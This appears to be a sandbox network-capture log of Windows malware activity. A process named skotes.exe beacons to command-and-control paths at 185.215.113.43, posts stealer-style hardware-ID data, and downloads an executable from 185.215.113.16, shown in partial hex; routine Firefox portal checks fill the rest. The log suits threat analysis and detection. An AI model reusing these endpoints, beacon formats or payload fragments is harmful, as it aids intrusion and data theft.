------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="build"tale------IEHDAFHDHCBFIDGCFIDG--
Nov 4, 2024 17:37:08.734911919 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:37:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	50388	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:37:08.761430979 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:37:09.680279016 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:37:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.5	50390	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:37:10.765044928 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 4, 2024 17:37:11.676836014 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:37:11 GMT Content-Type: application/octet-stream Content-Length: 2124288 Last-Modified: Mon, 04 Nov 2024 16:30:39 GMT Connection: keep-alive ETag: "6728f6af-206a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng, r@Pr !@P.d. p.v@.rsrc .@.idata .@ ).@fawplrfxPX@jtmuhxjqrB @.taggant0 r"H @
Nov 4, 2024 17:37:11.676887989 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:37:11.676901102 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:37:11.676973104 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:37:11.676985025 CET	1236	IN	Data Raw: 67 aa 18 40 31 8e b1 91 30 b6 ed 4f 82 ae b7 31 13 c5 3b 2b 83 e1 cb 13 2e 0c 87 79 c2 9d 2d d8 ef ab 65 ff c5 74 08 94 a3 1c 88 30 f0 ad 82 ab bb 14 74 1c 72 a4 64 41 33 4b ac 79 09 b4 e4 4b 31 28 7b 66 8a af f1 df ac b7 a9 e9 58 9a 34 68 68 67 Data Ascii: g@10O1;+.y-et0trdA3KyK1({fX4hhglra17asds1<\|.;` /~/t5sOcKk!Y5L57B<f/^_N"Y8!^0X;FEHN;n@Vs
Nov 4, 2024 17:37:11.676996946 CET	1236	IN	Data Raw: e4 9e 1b a0 4b 0a 98 87 cf 27 73 3b 3e 33 3c 2b 50 bb 24 b7 54 f4 f9 49 e1 61 32 03 13 2e 2d 21 ae 83 08 22 e0 e6 b1 1d 75 32 9a 2a e2 95 0e 92 e2 fa 2b 3a 35 0d 20 d8 55 33 46 f4 b9 3f 12 e1 99 51 00 7b 64 99 2f 75 c9 3e b0 11 ee 2e 57 65 42 54 Data Ascii: K's;>3<+P$TIa2.-!"u2*+:5 U3F?Q{d/u>.WeBT41{HPE<KW{uK&'x,pOzTAh(YIZ^khu;YfP<a+gp g(6l\|A3 ,\5\|5VWR#3P3p.4g2uDuP+
Nov 4, 2024 17:37:11.677107096 CET	1236	IN	Data Raw: 3d 46 16 1c 3a 36 69 32 ee a9 bd 0e 7f d4 9d 23 5a 2e 03 43 18 97 1c 98 ce 91 73 98 1b eb 18 32 e6 bf 93 74 7f e2 f3 1a 2e 67 3a c2 2f 98 34 18 f9 31 d6 79 a4 e5 31 31 35 98 35 d8 69 e7 2e 78 96 c8 9a af 73 c5 ca 24 0e 83 3d c9 14 1b 8c 28 ff 73 Data Ascii: =F:6i2#Z.Cs2t.g:/41y1155i.xs$=(s3a6Y"/(.?715v2BRG3tK&+ZB(If(`H)N"x>.(<,-u&+g)2VaT7*5%
Nov 4, 2024 17:37:11.677119017 CET	784	IN	Data Raw: c2 d8 03 29 70 98 a1 23 e2 1c 2b 6d de e5 2a 68 31 83 51 e9 63 bd 73 80 27 27 a0 4e f2 95 77 76 10 d3 b3 8b 26 4b 06 4b 09 23 ec 80 86 46 2b 04 00 c5 0c 8d 80 6b fc df 26 e5 c3 32 17 2f cc 79 c2 77 01 0c 0f e1 b2 21 97 b7 61 88 00 97 12 60 02 a0 Data Ascii: )p#+mh1Qcs''Nwv&KK#F+k&2/yw!a`\81Gml).ASH+3Qr~1\>KuA/P'0v G:%)$+l-y33d&{2b-wm\|BqQ@#S^lT
Nov 4, 2024 17:37:11.677130938 CET	1236	IN	Data Raw: d5 97 65 29 02 98 b0 23 7a eb 3d 1c 80 66 20 29 ee c5 49 49 82 b0 02 15 64 2b 2b 7c 00 0c 0b e8 b7 b5 a3 8f a1 a0 b3 31 da c0 27 3e 8a cf 83 28 e0 4f 05 43 b5 53 46 86 8e 2b 2b c8 ff 9d 0a 24 14 2d fc cf 26 e5 db 32 1f 2f a0 76 c2 57 06 e8 30 2d Data Ascii: e)#z=f )IId++\|1'>(OCSF++$-&2/vW0-ANR8>]1y1*\0p'7!m03&G!ks'3Z1_K~wY>3tK&w <Ks(3X{+],'
Nov 4, 2024 17:37:11.677141905 CET	1236	IN	Data Raw: 9b d7 f7 5a 2b 1f f4 90 26 d7 1b 96 9b c5 5f 76 d6 c9 7f 4f 27 1f a0 4e d3 98 7b 73 02 9e 50 30 27 e5 e7 32 ea 19 c0 71 ab 7f 9a 28 16 f4 b2 52 58 27 5d 29 0e 7d 57 22 0a 2b 2b 3a d0 9f 6a 2f b2 f7 2a 31 c6 98 32 db a9 b8 91 8f df a0 97 20 46 65 Data Ascii: Z+&_vO'N{sP0'2q(RX'])}W"++:j/12 FeI_b1W,Yz33!pTe)L$RjH/\dR'2YwWc)+a@K~.'B7F3`M#R1Ne`2:szX%Rv7CK 3
Nov 4, 2024 17:37:11.689240932 CET	1236	IN	Data Raw: 2d d0 b3 81 da c0 02 64 14 a6 2f 4f be 05 a2 87 54 a7 72 78 5d aa df 28 b3 27 5e 62 0f e9 cf 9a a5 32 03 84 54 be 51 98 d1 b0 db 21 c6 f0 c7 94 17 e7 9c 3e a3 69 a0 14 2f b5 0a a0 35 c8 8f b5 86 ce 93 b2 19 9b df cf 61 3b d0 53 27 9a bc 0c 97 2e Data Ascii: -d/OTrx]('^b2TQ!>i/5a;S'.Wk w&.V3Ixmri*cMf{ -mz")w~Yj8SM0#/1=++(3i~4xA{^EU`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.5	50391	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:37:11.315993071 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:37:12.231183052 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:37:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.5	50392	185.215.113.43	80	9184	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:37:13.758119106 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:37:14.680681944 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:37:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.5	50393	185.215.113.43	80	8832	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:37:16.316461086 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:37:17.222215891 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:37:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.5	50401	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:37:19.176513910 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:37:20.108789921 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59632 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:20.110232115 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59632 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:20.177319050 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:37:20.313666105 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59633 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:20.818742037 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:37:20.960360050 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59633 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:21.486803055 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:37:21.649487019 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59634 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:21.909714937 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:37:22.043191910 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59634 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:25.916815996 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:37:26.050909996 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59638 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:30.059763908 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:37:30.193610907 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59643 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:30.533273935 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59643 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:35.721664906 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:37:35.856376886 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59648 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:36.566473961 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:37:36.699860096 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59649 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:39.553472996 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:37:39.686152935 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59652 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:37:49.717441082 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:37:57.330889940 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:37:57.461146116 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59670 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:38:07.514956951 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:38:17.606710911 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:38:19.351394892 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
